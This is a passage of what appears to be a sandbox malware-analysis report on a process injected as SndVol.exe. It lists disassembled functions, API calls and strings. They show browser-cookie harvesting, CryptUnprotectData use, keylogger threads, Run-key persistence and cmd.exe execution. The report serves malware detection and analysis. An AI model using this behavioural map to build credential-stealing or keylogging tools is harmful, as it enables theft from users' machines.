
_strpbrk.LIBCMT ref: 0044E738
_free.LIBCMT ref: 0044E855

Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44

Strings

*?, xrefs: 0044E72C
., xrefs: 0044EA0C

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54

Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3

Strings

`#D, xrefs: 00442400
`#D, xrefs: 004424ED

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: `#D$`#D
API String ID: 885266447-2450397995
Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44

Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\SndVol.exe,00000104), ref: 00443475
_free.LIBCMT ref: 00443540
_free.LIBCMT ref: 0044354A

Strings

C:\Windows\SysWOW64\SndVol.exe, xrefs: 0044346C, 00443473, 004434A2, 004434DA

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\SysWOW64\SndVol.exe
API String ID: 2506810119-3942169294
Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98

Function 05394102 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\SndVol.exe,00000104), ref: 05394142
_free.LIBCMT ref: 0539420D
_free.LIBCMT ref: 05394217

Strings

C:\Windows\SysWOW64\SndVol.exe, xrefs: 05394139, 05394140, 0539416F, 053941A7

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\SysWOW64\SndVol.exe
API String ID: 2506810119-3942169294
Opcode ID: af1f721125d16a5649c2614678efed4fcbe5903473eac5654b9f8fee906498df
Instruction ID: fbc64a12d615e229907258e8c61d20c02d7a72ba40a0b61034de3df008ee923b
Opcode Fuzzy Hash: af1f721125d16a5649c2614678efed4fcbe5903473eac5654b9f8fee906498df
Instruction Fuzzy Hash: 113153F1A04618AFDF29DF99DD84DAEBBFDFF95710F104066E40597610D6B08A82CB90

Function 05368162 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,00466108,0046C7B0,00000000,00000000,00000000), ref: 053681C2

Part of subcall function 0536D152: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,05354DFC,00465E74), ref: 0536D16B

Sleep.KERNEL32(00000064), ref: 053681EE
DeleteFileW.KERNEL32(00000000), ref: 05368222

Strings

/t , xrefs: 053681A1

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t
API String ID: 1462127192-3161277685
Opcode ID: 4dd0ec4cfeb0374491295f618a4ee3a1ad734328a1d292c32991b8cb660b3280
Instruction ID: bd156c43e48156bf305a3e093251128c623287e364b50c9139bef2415e7343b8
Opcode Fuzzy Hash: 4dd0ec4cfeb0374491295f618a4ee3a1ad734328a1d292c32991b8cb660b3280
Instruction Fuzzy Hash: 04318575B00219AADF04FBA4DCD9EFE7774BF14220F005569ED06670D0EF642E8ACA54

Function 0539C4EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0539C84B,?,00000000,FF8BC35D), ref: 0539C59F
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0539C5CD
GetLastError.KERNEL32 ref: 0539C5FE

Strings

PkGNG, xrefs: 0539C4EE

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: PkGNG
API String ID: 2456169464-263838557
Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
Instruction ID: 8ddb03e6cba7f95a2a2c8b54c0529c2dce23b3dde01e9817bc61d9dd21ba2cc1
Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
Instruction Fuzzy Hash: 25315EB5A10219AFDF18CF59DC849EAB7B9EB48301F0444BDE90AD7290DA70ED80CF64

Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6

PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688

Strings

User Data\Default\Network\Cookies, xrefs: 0040C603
User Data\Profile ?\Network\Cookies, xrefs: 0040C635

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
API String ID: 1174141254-1980882731
Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698

Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559

PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757

Strings

User Data\Default\Network\Cookies, xrefs: 0040C6D2
User Data\Profile ?\Network\Cookies, xrefs: 0040C704

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
API String ID: 1174141254-1980882731
Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698

Function 0040B164 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662

Strings

], xrefs: 0040B180
[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040B17B

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
API String ID: 1497725170-1359877963
Opcode ID: 9c09dbf559b6626df1db828ec84372d5f10ce92b94fa13a2cdc470bbbf48d4b1
Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
Opcode Fuzzy Hash: 9c09dbf559b6626df1db828ec84372d5f10ce92b94fa13a2cdc470bbbf48d4b1
Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC

Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86

Strings

Online Keylogger Started, xrefs: 0040AF03, 0040AF0C, 0040AF36

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTime$wsprintf
String ID: Online Keylogger Started
API String ID: 112202259-1258561607
Opcode ID: 479f868247490eb8d94e44a3ac1295fc2cb218e13a7b72eda2db3aeddef0bb4d
Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
Opcode Fuzzy Hash: 479f868247490eb8d94e44a3ac1295fc2cb218e13a7b72eda2db3aeddef0bb4d
Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB

Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
GetProcAddress.KERNEL32(00000000), ref: 00406A89

Strings

crypt32, xrefs: 00406A7D
CryptUnprotectData, xrefs: 00406A78

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32
API String ID: 2574300362-2380590389
Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4

Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
CloseHandle.KERNEL32(?), ref: 004051CA
SetEvent.KERNEL32(?), ref: 004051D9

Strings

Connection Timeout, xrefs: 00405198

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59

Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040E833

Strings

ios_base::badbit set, xrefs: 0040E7EF
ios_base::eofbit set, xrefs: 0040E822
ios_base::failbit set, xrefs: 0040E815

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B

Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F823,pth_unenc,004752D8), ref: 0041384D
RegCloseKey.ADVAPI32(004752D8,?,0040F823,pth_unenc,004752D8), ref: 00413858

Strings

pth_unenc, xrefs: 00413818

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94

Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0

Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683

__CxxThrowException@8.LIBVCRUNTIME ref: 0040E016

Strings

bad locale name, xrefs: 0040E000

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C

Function 053644E1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 053644EC
RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,004590C0,?), ref: 0536451A
RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,004590C0,?,?,?,?,?,0535DC77,?,00000000), ref: 05364525

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 053644EA

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 1818849710-1051519024
Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
Instruction ID: a2bd7b0d685ded0c82b6323c57d5164527f1d3f96dd54000183d06e0d99f6f57
Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
Instruction Fuzzy Hash: 00F06D72540218FBDF00AFA0EC49FEE376CFF00A61F008968BD0696150EB719F04DA50

Function 0536443C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0536444B
RegSetValueExA.ADVAPI32(0046611C,0046CBB8,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0536D77E,0046CBB8,0046611C,00000001,00474EE0,00000000), ref: 05364473
RegCloseKey.ADVAPI32(0046611C,?,?,0536D77E,0046CBB8,0046611C,00000001,00474EE0,00000000,?,0535942A,00000001), ref: 0536447E

Strings

Control Panel\Desktop, xrefs: 05364445, 05364455

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Control Panel\Desktop
API String ID: 1818849710-27424756
Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
Instruction ID: 94a96eda6226da60c8962c11b6fa210f964f29b381838f9dc6fb5cbc2062fbfa
Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
Instruction Fuzzy Hash: E6F09072540218FFDF01AFA0DC49EEA376CEF04A61F108668BD0AA6051EB319E14DA90

Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
ShowWindow.USER32(00000009), ref: 00416C61
SetForegroundWindow.USER32 ref: 00416C6D

Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
Part of subcall function 0041CD9B: GetConsoleWindow.KERNEL32 ref: 0041CDAA
Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Window$Console$Show$AllocCreateForegroundOutputThread
String ID: !D@
API String ID: 186401046-604454484
Opcode ID: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
Opcode Fuzzy Hash: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D

Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130

Strings

open, xrefs: 0041612A
cmd.exe, xrefs: 00416125
/C , xrefs: 0041610E

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659

Function 0040B8AC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5

Strings

pth_unenc, xrefs: 0040B8AC

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: TerminateThread$HookUnhookWindows
String ID: pth_unenc
API String ID: 3123878439-4028850238
Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D

Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
GetProcAddress.KERNEL32(00000000), ref: 0040141B

Strings

GetCursorInfo, xrefs: 0040140A
User32.dll, xrefs: 0040140F

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll
API String ID: 1646373207-2714051624
Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
